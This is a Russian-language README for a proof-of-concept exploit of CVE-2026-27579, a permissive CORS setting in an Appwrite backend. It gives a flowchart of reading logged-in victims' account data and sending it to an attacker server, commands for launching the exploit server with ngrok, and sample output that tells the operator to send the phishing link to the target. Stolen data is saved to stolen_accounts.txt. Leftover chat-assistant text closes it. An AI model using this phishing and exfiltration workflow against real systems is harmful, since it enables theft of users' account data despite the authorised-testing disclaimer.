
Эксплойт PoC для CVE-2026-27579 — ошибка конфигурации CORS в бэкенде Appwrite, демонстрирующая кражу данных учётной записи с использованием учётных данных через вредоносную фишинговую страницу.
CVE-2026-27579 – Утечка данных аутентифицированных учётных записей из-за разрешающей конфигурации CORS
CVE-2026-27579 (GHSA-qh5m-p8jh-hx88)
Серьёзная некорректная конфигурация CORS в бэкенде Appwrite, используемом realtime-collaboration-platform, позволяет управляемому атакующим источнику читать конфиденциальные данные аутентифицированных пользователей (email, user ID, статус MFA и т. д.) у вошедших в систему жертв через междоменные запросы с учётными данными.
/v1/account с отражением Access-Control-Allow-Origin + Access-Control-Allow-Credentials: trueflowchart TD
A[Victim is logged in\nCollabPlatform / Appwrite] --> B[Victim visits attacker-controlled page\nphishing link / malvertising]
B --> C[Browser sends GET /v1/account\nwith session cookies credentials: 'include']
C --> D[Appwrite reflects arbitrary Origin\nAccess-Control-Allow-Origin: evil.com]
D --> E[Access-Control-Allow-Credentials: true]
E --> F[Browser allows JavaScript to read response\nemail, $id, mfa, name, ...]
F --> G[Data exfiltrated to attacker server\nPOST /collect]
G --> H[Attacker receives full account details]--lhost и --lportpip install flask
# Базовое использование
python3 exploit.py --lhost 192.168.1.100 --lport 8000
# Использование домена / публичного IP
python3 exploit.py --lhost attacker.yourdomain.com --lport 8080
# Для публичного доступа (рекомендуется)
# 1. Запустите скрипт
# 2. Используйте ngrok: ngrok http 8000
# 3. Замените http://<lhost>:<lport> в коде на ваш ngrok URL
# (или перезапустите с --lhost = ваш-ngrok-url.ngrok-free.app)
Пример вывода при запуске:
[*] Starting malicious server → http://192.168.1.100:8000
[*] Send this link to the target:
http://192.168.1.100:8000/
Жертва переходит по ссылке, будучи авторизованной → данные появляются в терминале + сохраняются в stolen_accounts.txt
Этот код предоставлен исключительно в образовательных целях, для авторизованного тестирования безопасности, упражнений red-team и исследований уязвимостей.
Несанкционированное использование против любой системы или лица без явного письменного разрешения является незаконным в большинстве юрисдикций (законы о компьютерном мошенничестве, несанкционированном доступе, краже данных, фишинге и т. д.).
Используйте только в средах, которыми вы владеете или на тестирование которых имеете официальное разрешение.
Mohammed Idrees Banyamer
Security Researcher
Jordan
Instagram: @banyamer_security
Не стесняйтесь копировать и вставлять это напрямую в ваш файл README.md.
Если вы хотите добавить скриншоты, изменить цвета бейджей, добавить дополнительные разделы (Demo, Mitigation и т. д.) или включить бейдж лицензии / счётчики звёзд / форков — дайте мне знать, и я смогу расширить этот материал.